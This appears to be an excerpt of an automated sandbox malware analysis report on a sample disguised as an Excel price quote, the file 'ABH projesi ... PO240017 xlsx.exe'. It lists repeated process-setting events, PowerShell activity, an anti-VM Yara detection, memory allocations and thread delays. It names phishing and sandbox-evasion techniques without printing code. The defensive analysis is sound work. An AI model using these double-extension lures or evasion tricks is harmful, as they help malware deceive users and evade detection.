Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe PID: 280, type: MEMORYSTR

Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Memory allocated: 1030000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Memory allocated: 2810000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Memory allocated: 4810000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Memory allocated: 75D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Memory allocated: 85D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Memory allocated: 8780000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Memory allocated: 9780000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Memory allocated: 1140000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Memory allocated: 2C20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Memory allocated: 4C20000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Thread delayed: delay time: 599343	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Thread delayed: delay time: 599234	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Thread delayed: delay time: 599125	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Thread delayed: delay time: 599015	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Thread delayed: delay time: 598906	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Thread delayed: delay time: 598797	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Thread delayed: delay time: 598687	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Thread delayed: delay time: 598576	Jump to behavior
